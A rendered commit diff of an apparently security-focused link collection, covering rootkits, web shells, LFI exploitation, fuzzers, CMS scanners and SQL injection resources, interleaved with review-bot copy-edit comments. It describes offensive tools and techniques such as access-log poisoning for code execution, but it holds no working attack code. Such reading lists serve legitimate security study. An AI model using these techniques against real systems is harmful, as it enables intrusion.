Defeating Sniffers and Intrustion Detection Systems - Horizon, 12/25/1998
Armouring the ELF: Binary Encryption on the UNIX Platform - grugq, scut, 12/28/2001
Runtime Process Infection - anonymous, 07/28/2002
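Review bot: The pasted hard-drive backdoor abstract keeps PDF extraction damage: `o -the-shelf` (off-the-shelf), `back- door`, `re- mote`, `ex-filtrate`, `key le` (key file), `diffculty`, `at- tack`; clean these so the entry is readable and searchable. `Intrustion` in the Horizon entry should be `Intrusion`. The plain-text entries (`Defeating Sniffers ...`, `Armouring the ELF ...`, `Runtime Process Infection ...`) carry author and date but no link, unlike the rest of the section.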
@ -25,6 +32,8 @@ Stealth Hooking: Another Way to Subvert the Windows Kernel - mxatone, ivanlef0u,
Mystifying the Debugger for Ultimate Stealthness - halfdead, 04/11/2008
Binary Mangling with Radare - pancake, 06/11/2009
[Concepts for the Steal the Windows Rootkit (The Chameleon Project)Joanna Rutkowska2003](http://repo.hackerzvoice.net/depot_madchat/vxdevl/avtech/Concepts%20for%20the%20Stealth%20Windows%20Rootkit%20%28The%20Chameleon%20Project%29.pdf)
* Many people do not realize the real danger from rootkit technology. One reason for this is probably that publicly available rootkits for Windows OS are relatively easy to detect by conventional methods (i.e.memoryscanningbased). However, we can imagine some techniques of rootkit implementation, which will be undetectable by these methods, even if the rootkit concept will be publicly available. 000In order to convince people that traditional rootkit detection is insufficient it would be desirable to have a working rootkit implementing such sophisticated technology. Besides, it would be fun.
http://www.phrack.com/papers/revisiting-mac-os-x-kernel-rootkits.html
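Review bot: The link text on the Chameleon Project line is mangled: it reads "Concepts for the Steal the Windows Rootkit (The Chameleon Project)Joanna Rutkowska2003" while the URL itself says "Stealth"; suggest "Concepts for the Stealth Windows Rootkit (The Chameleon Project) - Joanna Rutkowska, 2003". The description bullet under it carries copy-paste debris ("000In order to convince" and "memoryscanningbased", which should be "memory-scanning based"), and the closing Phrack URL for the OS X kernel rootkits paper is bare where the rest of the hunk uses [title](url).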


+ 1
- 1
Draft/Draft/System Internals Windows and Linux Internals Reference.md View File

@ -97,7 +97,7 @@ WinPrefetchView is a small utility that reads the Prefetch files stored in your
[Pushing the Limits of Windows: Virtual Memory](http://blogs.technet.com/b/markrussinovich/archive/2008/11/17/3155406.aspx)
[PE File Format Graphs](http://blog.dkbza.org/2012/08/pe-file-format-graphs.html?view=mosaic)


+ 17
- 2
Draft/Draft/To Do/add cull -1.txt View File

@ -4,7 +4,7 @@ http://projectshellcode.com/?q=node/12
[Enumerating DNSSEC NSEC and NSEC3 Records](https://www.altsci.com/concepts/page.php?s=dnssec&p=1)
http://www.legbacore.com/Research.html
@ -14,6 +14,21 @@ http://www.legbacore.com/Research.html
* This guide explains how to build custom live system images for security sandboxing using tools from the Debian Live Systems project and Grsecurity. For concreteness we will focus on building a custom live image for sandboxing the Firefox web browser (also known as Iceweasel in the Debian world). However, the same tools and procedures will allow you to build any kind of Debian-based live image you want.
https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet
https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet
[Bootkit Disk Forensics
[Part 1](http://www.malwaretech.com/2015/02/bootkit-disk-forensics-part-1.html)
[Part 2](http://www.malwaretech.com/2015/03/bootkit-disk-forensics-part-2.html)
[Github dorks - finding vulns](http://blog.conviso.com.br/2013/06/github-hacking-for-fun-and-sensitive.html)
[rdtsc x86 instruction to detect virtual machines](http://blog.badtrace.com/post/rdtsc-x86-instruction-to-detect-vms/)
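Review bot: "[Bootkit Disk Forensics" opens a markdown link bracket that is never closed, so it and the "Part 1"/"Part 2" links beneath it will not render as intended; make it a plain line such as "Bootkit Disk Forensics:" with the two part links nested under it. The abstract bullet about building Debian Live/Grsecurity sandbox images appears to have been added without the link entry it describes, so the reader gets no title or URL for the guide. The two OWASP cheat-sheet URLs are bare while the neighbouring entries use [title](url).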
@ -45,7 +60,7 @@ shellcode tutorials http://projectshellcode.com/?q=node/12
[QR Inception: Barcode-in-Barcode Attacks](https://www.sba-research.org/wp-content/uploads/publications/qrinception.pdf)
* 2D barcodes offer many benefits compared to 1D barcodes, such as high information density and robustness. Before their introduction to the mobile phone ecosystem, they have been widely used in speci c applications, such as logistics or ticketing. However, there are multiple competing standards with different benefits and drawbacks. Therefore, reader applications as well as dedicated devices have to support multiple standards. In this paper, we present novel attacks based on deliberately caused ambiguities when especially crafted barcodes conform to multiple standards. Implementation details de- cide which standard the decoder locks on. This way, two users scanning the same barcode with di erent phones or apps will receive different content. This potentially opens way for multiple problems related to security. We describe how embedding one barcode symbology into another can be used to perform phishing attacks as well as targeted exploits. In addition, we evaluate the extent to which popular 2D barcode reader applications on smartphones are susceptible to these barcode-in-barcode attacks. We furthermore discuss mitigation techniques against this type of attack.
* 2D barcodes offer many benefits compared to 1D barcodes, such as high information density and robustness. Before their introduction to the mobile phone ecosystem, they have been widely used in specific applications, such as logistics or ticketing. However, there are multiple competing standards with different benefits and drawbacks. Therefore, reader applications as well as dedicated devices have to support multiple standards. In this paper, we present novel attacks based on deliberately caused ambiguities when especially crafted barcodes conform to multiple standards. Implementation details decide which standard the decoder locks on. This way, two users scanning the same barcode with different phones or apps will receive different content. This potentially opens way for multiple problems related to security. We describe how embedding one barcode symbology into another can be used to perform phishing attacks as well as targeted exploits. In addition, we evaluate the extent to which popular 2D barcode reader applications on smartphones are susceptible to these barcode-in-barcode attacks. We furthermore discuss mitigation techniques against this type of attack.
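Review bot: The ligature repair in the QR Inception abstract is correct ("speci c" to "specific", "di erent" to "different", "de- cide" to "decide"); the hard-disk firmware abstract added earlier in this same commit shows the same "fi"/"ff" dropout ("o -the-shelf", "key le") and would benefit from the same pass.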


+ 176
- 81
Draft/Draft/Web & Browsers.md View File

@ -5,187 +5,234 @@
TOC
Intro
General
Cull
General Attacks & OWASP Top Ten
Databases
* MongoDB
* PostgreSQL
* Mysql
* Oracle
* MSSQL
Securing Web Applications
Books
Papers
Talks
Reference Sites
CMSs
Web Application Attacks & Write-ups
WebShells
11
###General
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
* This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
[Javascript De-Obfuscation Tools Redux](http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/)
* Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
http://yehg.net/encoding/
[Unphp.net php decoder](http://www.unphp.net/decode/)
[Various forms of encoding/decoding web app](http://yehg.net/encoding/)
###Cull
prompt.ml
[Client Identification Mechanisms](http://www.chromium.org/Home/chromium-security/client-identification-mechanisms)
[Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
[Security and Open Redirects Impact of 301-ing people in 2013](https://makensi.es/rvl/openredirs/#/)
[Writing an XSS Worm](http://blog.gdssecurity.com/labs/2013/5/8/writing-an-xss-worm.html)
https://xss-game.appspot.com/
XSS game http://escape.alf.nu/
[SSL/TLS Interception Proxies and Transitive Trust](http://media.blackhat.com/bh-eu-12/Jarmoc/bh-eu-12-Jarmoc-SSL_TLS_Interception-WP.pdf)
* Secure Sockets Layer (SSL) [ 1 ] and its successor Transport Layer Security (TLS) [ 2 ] have become key components of the modern Internet . The privacy, integrity, and authenticity [ 3 ] [ 4 ] provided by these protocols are critical to allowing sensitive communications to occur . Without these systems, e - commerce, online banking , and business - to - business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities . Advanced Persistent Threat ( APT ) attackers [ 5 ] , botnets [ 6 ] , and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end - to - end encrypted channels. Web proxies, data loss prevention ( DLP ) systems, spec ialized threat detection solutions, and network intrusion prevention systems ( N IPS ) offer functionality to intercept, inspect , and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surve illance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies ,” these solutions act as a “ man in the middle , ” violating the end - to - end security promises of SSL. This type of interception comes at a cost . Intercepti ng SSL - encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation . Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
###Educational
[Intro to content Security Policy](www.html5rocks.com/en/tutorials/security/content-security-policy/)
###General Tools
[ParrotNG](https://github.com/ikkisoft/ParrotNG/releases)
* ParrotNG is a Java-based tool for automatically identifying vulnerable SWF files, built on top of swfdump. One JAR, two flavors: command line tool and Burp Pro Passive Scanner Plugin.
[WebAppSec Testing Checklist](http://tuppad.com/blog/wp-content/uploads/2012/03/WebApp_Sec_Testing_Checklist.pdf)
[HTTPie - curl for humans](https://github.com/jakubroztocil/httpie)
* HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
http://google-gruyere.appspot.com/part1
[leaps - shared text editing in Golang](https://github.com/denji/leaps)
* Leaps is a service for hosting collaboratively edited documents using operational transforms to ensure zero-collision synchronization across any number of editing clients.
[HTTrack - Website Copier](https://www.httrack.com/)
* It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
[OWASP Web Application Security Testing Cheat Sheet](https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet)
[lan-js](https://github.com/jvennix-r7/lan-js)
* Probe LAN devices from a web browser.
[OWASP Mantra](http://www.getmantra.com/hackery/)
* “OWASP Mantra is a powerful set of tools to make the attacker's task easier”
[MCIR - Magical Code Injection Rainbow](https://github.com/SpiderLabs/MCIR)
* The Magical Code Injection Rainbow! MCIR is a framework for building code injection vulnerability testbeds. MCIR unites SQLol, XMLmao, ShelLOL and XSSmh together in a magical world of code injection! They can experience the magic of feature sharing. Instead of having to wait for unicornFurnace to update each one, all the MCIR friends get updates they can all use! YAY! MCIR is designed to be good at making new friends, and they get to share updates to sanitization routines, environmental factor options, and interface tweaks. If you want to make a new friend to join the dancing and singing in the Magical Code Injection Rainbow, you can use any of the existing MCIR friends as a template and rewrite the portion where the friend does its magic, so we can inject ALL the things! YIPPEE!1
[wikto](https://github.com/sensepost/wikto)
* Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
[OWASP Testing Checklist](https://www.owasp.org/index.php/Testing_Checklist)
###Brute Force/Fuzzing
[Dirbuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
* DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
[skipfish](https://code.google.com/p/skipfish/)
* Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
[Go Buster](https://github.com/OJ/gobuster)
* Directory/file busting tool written in Go
* Recursive, CLI-based, no java runtime
[WFuzz](https://code.google.com/p/wfuzz/
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc
###CMS's
[Drupal Security Checklist](https://github.com/gfoss/attacking-drupal/blob/master/presentation/drupal-security-checklist.pdf)
[HTTPie - curl for humans](https://github.com/jakubroztocil/httpie)
* HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
[Drupal Attack Scripts](https://github.com/gfoss/attacking-drupal)
* Set of brute force scripts and Checklist
[CMSExplorer](https://code.google.com/p/cms-explorer/)
* CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
JoomScan: https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project
Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
[Droopescan](https://github.com/droope/droopescan)
* A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
[Sparty - Sharepoint/Frontpage Auditing Tool](https://github.com/alias1/sparty)
* Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
[WPScan](https://github.com/wpscanteam/wpscan)
* WPScan is a black box WordPress vulnerability scanner.
[BlindElephant Web Application Fingerprinter](http://blindelephant.sourceforge.net/)
* The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
Bypassing WAFs](http://www.nethemba.com/bypassing-waf.pdf)
https://xss-game.appspot.com/
###Site/Webapp Scanners
[skipfish](https://code.google.com/p/skipfish/)
* Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
XSS game http://escape.alf.nu/
[wikto](https://github.com/sensepost/wikto)
* Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
[RAWR - Rapid Assessment of Web Resources](https://bitbucket.org/al14s/rawr/wiki/Home)
[Arachni Web Scanner](http://www.arachni-scanner.com/)
* Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
[Making Mongo Cry Attacking NoSQL for Pen Testers Russell Butturini](https://www.youtube.com/watch?v=NgsesuLpyOg)
###Web Proxies
[Burpsuite](http://portswigger.net/burp/)
* Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
[C02](https://code.google.com/p/burp-co2/)
* Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
[ZAP - Zed Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project)
* The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
[leaps - shared text editing in Golang](https://github.com/denji/leaps)
* Leaps is a service for hosting collaboratively edited documents using operational transforms to ensure zero-collision synchronization across any number of editing clients.
[Paros - Web Proxy](http://sourceforge.net/projects/paros/)
* A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
* This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
###Web Shells
[Weevely](https://github.com/epinna/weevely3)
* Weevely is a command line web shell dinamically extended over the network at runtime used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.
* [Getting Started](https://github.com/epinna/weevely3/wiki#getting-started)
[Drupal Attack Scripts](https://github.com/gfoss/attacking-drupal)
* Set of brute force scripts and Checklist
[b374k shell 3.2](https://github.com/b374k/b374k)
* This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
[Drupal Security Checklist](https://github.com/gfoss/attacking-drupal/blob/master/presentation/drupal-security-checklist.pdf)
[SQL Injection wiki](http://www.sqlinjectionwiki.com/)
[Shadow Daemon](https://shadowd.zecure.org/overview/introduction/)
* Shadow Daemon is a collection of tools to detect, protocol and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the license GPLv2, so its source code can be examined, modified and distributed by everyone.
[unindexed](https://github.com/mroth/unindexed/blob/master/README.md)
* The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.
[Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control](http://ericchen.me/self_exfiltration.pdf)
* Abstract —Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
[The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines](http://users.ics.forth.gr/~elathan/papers/ndss15.pdf)
* Abstract —Return-oriented programming (ROP) has become the dominant form of vulnerability exploitation in both user and kernel space. Many defenses against ROP exploits exist, which can significantly raise the bar against attackers. Although protecting existing code, such as applications and the kernel, might be possible, taking countermeasures against dynamic code, i.e., code that is generated only at run-time, is much harder. Attackers have already started exploiting Just-in-Time (JIT) engines, available in all modern browsers, to introduce their (shell)code (either native code or re-usable gadgets) during JIT compilation, and then taking advantage of it. Recognizing this immediate threat, browser vendors started employing defenses for hardening their JIT engines. In this paper, we show that—no matter the employed defenses—JIT engines are still exploitable using solely dynamically generated gadgets. We demonstrate that dynamic ROP payload construction is possible in two modern web browsers without using any of the available gadgets contained in the browser binary or linked libraries. First, we exploit an open source JIT engine (Mozilla Firefox) by feeding it malicious JavaScript, which once processed generates all re- quired gadgets for running any shellcode successfully. Second, we exploit a proprietary JIT engine, the one in the 64-bit Microsoft Internet Explorer, which employs many undocumented, specially crafted defenses against JIT exploitation. We manage to bypass all of them and create the required gadgets for running any shellcode successfully. All defensive techniques are documented in this paper to assist other researchers. Furthermore, besides showing how to construct ROP gadgets on-the-fly, we also show how to discover them on-the-fly, rendering current randomization schemes ineffective. 
Finally, we perform an analysis of the most important defense currently employed, namely constant blinding , which shields all three-byte or larger immediate values in the JIT buffer for hindering the construction of ROP gadgets. Our analysis suggests that extending constant blinding to all immediate values (i.e., shielding 1-byte and 2-byte constants) dramatically decreases the JIT engine’s performance, introducing up to 80% additional instructions
###Securing Web Applications
###Non-Attack Writeups
[Security and Open Redirects Impact of 301-ing people in 2013](https://makensi.es/rvl/openredirs/#/)
[DOM Clobbering Attack](http://www.thespanner.co.uk/2013/05/16/dom-clobbering/)
###Securing Web Applications/Checklists
[Center for Internet Security Apache Server 2.4 Hardening Guide](https://benchmarks.cisecurity.org/tools2/apache/CIS_Apache_HTTP_Server_2.4_Benchmark_v1.1.0.pdf)
[Securing Web Application Technologies Checklist](http://www.securingthehuman.org/developer/swat)
[OWASP Testing Checklist](https://www.owasp.org/index.php/Testing_Checklist)
[WebAppSec Testing Checklist](http://tuppad.com/blog/wp-content/uploads/2012/03/WebApp_Sec_Testing_Checklist.pdf)
[OWASP Web Application Security Testing Cheat Sheet](https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet)
[Magical Code Injection Rainbow Framework](https://github.com/SpiderLabs/MCIR)
* The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds. Has testing lessons for xss/csrf/sql
###Web Application Firewalls
###LFI & RFI
[LFI Local File Inclusion Techniques (paper)](http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/)
* This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
* [Update: a third (known) technique has been dissected here](http://www_ush_it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/ )
[ModSecurity](https://github.com/SpiderLabs/ModSecurity)
* ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys
[Shadow Daemon](https://shadowd.zecure.org/overview/introduction/)
* Shadow Daemon is a collection of tools to detect, protocol and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the license GPLv2, so its source code can be examined, modified and distributed by everyone.
[Liffy](https://github.com/rotlogix/liffy)
* Liffy is a Local File Inclusion Exploitation tool.
Current features include:
data:// for code execution
expect:// for code execution
input:// for code execution
filter:// for arbitrary file reads
/proc/self/environ for code execution in CGI mode
Apache access.log poisoning
Linux auth.log SSH poisoning
Direct payload delivery with no stager
Support for absolute and relative paths
Support for cookies
! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh.
[Bypassing WAFs](http://www.nethemba.com/bypassing-waf.pdf)
###Web Application Attacks & Write-ups
[Relative Path Overwrite Explanation/Writeup](http://www.thespanner.co.uk/2014/03/21/rpo/)
* RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
[Attacking Adobe ColdFusion](http://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html)
[ColdFusion Security Resources](https://www.owasp.org/index.php/ColdFusion_Security_Resources)
[ColdFusion for Penetration Testers](http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers)
###HTML 5
[SH5ARK](http://sh5ark.professionallyevil.com)
* The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them
* [Presentation on SH5ARK](https://www.youtube.com/watch?v=1ZZ-vIwmWx4)
###LFI & RFI
* [GetSH5ARK here](http://sourceforge.net/projects/sh5ark/)
[LFI Local File Inclusion Techniques (paper)](http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/)
* This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
* [Update: a third (known) technique has been dissected here](http://www_ush_it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/ )
[Liffy](https://github.com/rotlogix/liffy)
* Liffy is a Local File Inclusion Exploitation tool.
###XSS
[Writing an XSS Worm](http://blog.gdssecurity.com/labs/2013/5/8/writing-an-xss-worm.html)
##(NO)SQL Injection
##(NO)SQL Injection
[SQL Injection Cheat Sheet](http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/)
[SQL Injection wiki](http://www.sqlinjectionwiki.com/)
[SQL Injection Knowledge Base](http://websec.ca/kb/sql_injection#MySQL_Testing_Injection)
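Review bot: duplicated heading and a mis-placed section break in this region of Web Applications.md. `##(NO)SQL Injection` appears twice in a row; drop one. The `###LFI & RFI` heading is inserted between `* [Presentation on SH5ARK]` and `* [GetSH5ARK here]`, so the SH5ARK download link ends up filed under LFI & RFI instead of HTML 5; move the heading below that bullet (and fix the link text to `Get SH5ARK here`). Liffy is listed twice, once with the full feature list and the first-person access-log note and once with only the one-line description under LFI & RFI; keep a single entry. The ush.it update link uses underscores instead of dots in the host (`http://www_ush_it/2008/07/09/...`) and has a trailing space inside the parentheses, so it will not resolve; the domain, as in the entry above it, is `www.ush.it`.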
@ -194,9 +241,9 @@ Support for cookies
[Laduanum](http://laudanum.sourceforge.net/)
* “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”
[Making Mongo Cry Attacking NoSQL for Pen Testers Russell Butturini](https://www.youtube.com/watch?v=NgsesuLpyOg)
[MongoDB: Typical Security Weaknesses in a NoSQL DB](http://blog.spiderlabs.com/2013/03/mongodb-security-weaknesses-in-a-typical-nosql-database.html)
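Review bot: typo in the link text `[Laduanum](http://laudanum.sourceforge.net/)`: the project is Laudanum, as both the URL and the quoted description say; fix the link text so the entry is findable. The quoted description is also missing a space at `environments.They`.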
@ -219,4 +266,52 @@ Impidence mismatch
Bypass addslashes()
Bypassing mysql_real_escape_string. (under special conditions)
Stacked SQL injections.
Secondary channel extraction
Secondary channel extraction
###HTML 5
[SH5ARK](http://sh5ark.professionallyevil.com)
* The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them
* [Presentation on SH5ARK](https://www.youtube.com/watch?v=1ZZ-vIwmWx4)
* [GetSH5ARK here](http://sourceforge.net/projects/sh5ark/)
###Papers
[The Spy in the Sandbox – Practical Cache Attacks in Javascript](http://iss.oy.ne.ro/SpyInTheSandbox.pdf)
